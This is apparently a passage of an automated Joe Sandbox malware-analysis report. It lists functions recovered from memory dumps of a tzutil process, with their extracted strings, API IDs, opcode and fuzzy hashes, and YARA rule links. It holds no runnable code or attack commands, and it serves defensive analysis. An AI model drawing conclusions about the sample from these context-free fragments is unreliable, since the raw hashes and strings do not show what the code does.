                                                    • API String ID:
                                                    • Opcode ID: 54c83316a2d1e38cf01f858fa1577372f4876acfbed09934fba294c8bba2248b
                                                    • Instruction ID: 9160e7f279f5d959982684473bf3e18593b441175d548771ed81bdc729477f91
                                                    • Opcode Fuzzy Hash: 54c83316a2d1e38cf01f858fa1577372f4876acfbed09934fba294c8bba2248b
                                                    • Instruction Fuzzy Hash: E741E374A1CF0D4FD36CEFA894D17B6B3E1FB89300F50052DD98AC7292EA74E8468685
                                                    Function 0330E0C9 Relevance: 56.5, Strings: 45, Instructions: 249COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2538113397.0000000003300000.00000040.00000800.00020000.00000000.sdmp, Offset: 03300000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3300000_tzutil.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                    • API String ID: 0-3558027158
                                                    • Opcode ID: 47cf9afc285d78d3c590a56293d944d5d20f980efb9425facb2a64674c5c23be
                                                    • Instruction ID: 5d2001694e26a0744286d6f4ece10c6170f8c0fb9844beea746dc0665192fb5a
                                                    • Opcode Fuzzy Hash: 47cf9afc285d78d3c590a56293d944d5d20f980efb9425facb2a64674c5c23be
                                                    • Instruction Fuzzy Hash: C1A172F04082948AC7158F54A0652AFFFB5EBC6305F1581ADE6E6BB243C3BE8905CB85
                                                    Function 03472890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2538262690.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                    • Associated: 00000006.00000002.2538262690.0000000003529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000006.00000002.2538262690.000000000352D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000006.00000002.2538262690.000000000359E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3400000_tzutil.jbxd
                                                    Similarity
                                                    • API ID: ___swprintf_l
                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                    • API String ID: 48624451-2108815105
                                                    • Opcode ID: dfb2ab201aba613860b8ddaddb2c2ce2a578490b72da1ce0d487f64dedbc36d7
                                                    • Instruction ID: 3849aca05d3806e097de92d7cbcdbed50a850603cac0f28d50e16cbdd20129d1
                                                    • Opcode Fuzzy Hash: dfb2ab201aba613860b8ddaddb2c2ce2a578490b72da1ce0d487f64dedbc36d7
                                                    • Instruction Fuzzy Hash: 9451D5B5B00516BFCB10DB9888909BFF7B8BB49200758866BE4A5DF641D274DE40CBA8
                                                    Function 03467630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 034A4787
                                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 034A4725
                                                    • ExecuteOptions, xrefs: 034A46A0
                                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 034A4655
                                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 034A4742
                                                    • Execute=1, xrefs: 034A4713
                                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 034A46FC
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2538262690.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                    • Associated: 00000006.00000002.2538262690.0000000003529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000006.00000002.2538262690.000000000352D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000006.00000002.2538262690.000000000359E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3400000_tzutil.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                    • API String ID: 0-484625025
                                                    • Opcode ID: 6155378a286dc3fc4561b155d6678c8ba13fa7811350f1e1be1f24cac9b4c065
                                                    • Instruction ID: 6633c514fc4ea3ec2782d37d2437d68f5bea1f8772490947faf64e61b3f56107
                                                    • Opcode Fuzzy Hash: 6155378a286dc3fc4561b155d6678c8ba13fa7811350f1e1be1f24cac9b4c065
                                                    • Instruction Fuzzy Hash: F5513B756003096EDB20EFA9DC85FEE7BB8AF14314F1400ABD505AF390E771AA458B59
                                                    Function 0347B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2538262690.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                    • Associated: 00000006.00000002.2538262690.0000000003529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000006.00000002.2538262690.000000000352D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000006.00000002.2538262690.000000000359E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3400000_tzutil.jbxd
                                                    Similarity
                                                    • API ID: __aulldvrm
                                                    • String ID: +$-$0$0
                                                    • API String ID: 1302938615-699404926
                                                    • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                    • Instruction ID: 190be8e3f855835c29307f5b229531a12148b597511bb2a7c84519a7f6e38254
                                                    • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                    • Instruction Fuzzy Hash: 6E81BF74E052499EDF24CE68C8917FEBBB6EF45320F1C425BD861AF390C73498418B69
                                                    Function 03303CBE Relevance: 8.8, Strings: 7, Instructions: 68COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2538113397.0000000003300000.00000040.00000800.00020000.00000000.sdmp, Offset: 03300000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3300000_tzutil.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: XQcQ$X]_Q$gURU$uZPF$vA]X$w\F[$y[N]
                                                    • API String ID: 0-1416458366
                                                    • Opcode ID: dedf437aa38687259b1bad9c904173211a3205b851b084e00ad0a60b07b74ce9
                                                    • Instruction ID: b040f0d7a74d91f11ead4c9af3af8c3f84433f4f36593296c1a7e9126940d023
                                                    • Opcode Fuzzy Hash: dedf437aa38687259b1bad9c904173211a3205b851b084e00ad0a60b07b74ce9
                                                    • Instruction Fuzzy Hash: 9E3102B091038CEBCB09CF94D5846DEBBB1FF04388F818559E81A6F250C771865ACB89
                                                    Function 0345F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 034A02BD
                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 034A02E7
                                                    • RTL: Re-Waiting, xrefs: 034A031E
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2538262690.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                    • Associated: 00000006.00000002.2538262690.0000000003529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000006.00000002.2538262690.000000000352D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000006.00000002.2538262690.000000000359E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3400000_tzutil.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                    • API String ID: 0-2474120054
                                                    • Opcode ID: 38d9de2bd5d68b9d22f3905dcbaf2d0b2a99242a0acd0263f59817186a547686
                                                    • Instruction ID: 500a430ecd6e8a603e56fcd3d3d0ca1709eda35d9053f14df8333e05cd389bdd
                                                    • Opcode Fuzzy Hash: 38d9de2bd5d68b9d22f3905dcbaf2d0b2a99242a0acd0263f59817186a547686
                                                    • Instruction Fuzzy Hash: D8E18C31A04B41DFD724CF28C884B6AB7E4BB44314F180A5EF9A58F3A1D775D949CB4A
                                                    Function 0346BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • RTL: Resource at %p, xrefs: 034A7B8E
                                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 034A7B7F
                                                    • RTL: Re-Waiting, xrefs: 034A7BAC
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2538262690.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                    • Associated: 00000006.00000002.2538262690.0000000003529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000006.00000002.2538262690.000000000352D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000006.00000002.2538262690.000000000359E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3400000_tzutil.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                    • API String ID: 0-871070163
                                                    • Opcode ID: c813fac53e79939e7bb44130736654a8397e5e0490ac7cfa967e43b15b27aa1f
                                                    • Instruction ID: 744f114dd1256efbd74b17aaf5c9c18e0a9d0bafc8693eca25f5ba6320665f04
                                                    • Opcode Fuzzy Hash: c813fac53e79939e7bb44130736654a8397e5e0490ac7cfa967e43b15b27aa1f
                                                    • Instruction Fuzzy Hash: 7D41E5353007029FC728DE2ACC40B6BB7E9EB98710F14091EE956DF790D731E4058B9A
                                                    Function 0346B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 034A728C
                                                    Strings
                                                    • RTL: Resource at %p, xrefs: 034A72A3
                                                    • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 034A7294
                                                    • RTL: Re-Waiting, xrefs: 034A72C1
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2538262690.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                    • Associated: 00000006.00000002.2538262690.0000000003529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000006.00000002.2538262690.000000000352D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000006.00000002.2538262690.000000000359E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3400000_tzutil.jbxd
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                    • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                    • API String ID: 885266447-605551621
                                                    • Opcode ID: 97fbdf91e9992b2d152f3593f8fa0b2421b6c8445247565f1ec57a1f7e57c24c
                                                    • Instruction ID: 86e0366dad6b11ba8a6465968d3d7410d6f35a5f7bbe669803305ce7843c7ec0
                                                    • Opcode Fuzzy Hash: 97fbdf91e9992b2d152f3593f8fa0b2421b6c8445247565f1ec57a1f7e57c24c
                                                    • Instruction Fuzzy Hash: 3D41E136700A06AFC720DE6ACC41B6ABBA5FB94714F14462BF855DF380DB21F81687D9
                                                    Function 03477D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2538262690.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                    • Associated: 00000006.00000002.2538262690.0000000003529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000006.00000002.2538262690.000000000352D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000006.00000002.2538262690.000000000359E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3400000_tzutil.jbxd
                                                    Similarity
                                                    • API ID: __aulldvrm
                                                    • String ID: +$-
                                                    • API String ID: 1302938615-2137968064
                                                    • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                    • Instruction ID: 3797f2461f9603d70e8fd521aef8a8712ad08115261ae9cbbc3048cfe937b5e3
                                                    • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                    • Instruction Fuzzy Hash: 9B918170E002169EDB24DF69C981AFFBBA5AF44720F98451BE865EF3D0D73099428B58
                                                    Function 03439126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2538262690.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                    • Associated: 00000006.00000002.2538262690.0000000003529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000006.00000002.2538262690.000000000352D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000006.00000002.2538262690.000000000359E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3400000_tzutil.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $$@
                                                    • API String ID: 0-1194432280
                                                    • Opcode ID: 3d3a6df4a55a9d22efad0b02051240eda7e941a3c43e449110ee5704ea889b29
                                                    • Instruction ID: ab6d1f0bf04d725aa5249a3fc28d94c7fe4129c2b41d4a5fb15b4e3b71714d27
                                                    • Opcode Fuzzy Hash: 3d3a6df4a55a9d22efad0b02051240eda7e941a3c43e449110ee5704ea889b29
                                                    • Instruction Fuzzy Hash: D5814B76D002699BEB31CF54CC44BEEB6B4AB09710F0445EBE919BB290D7709E85CFA4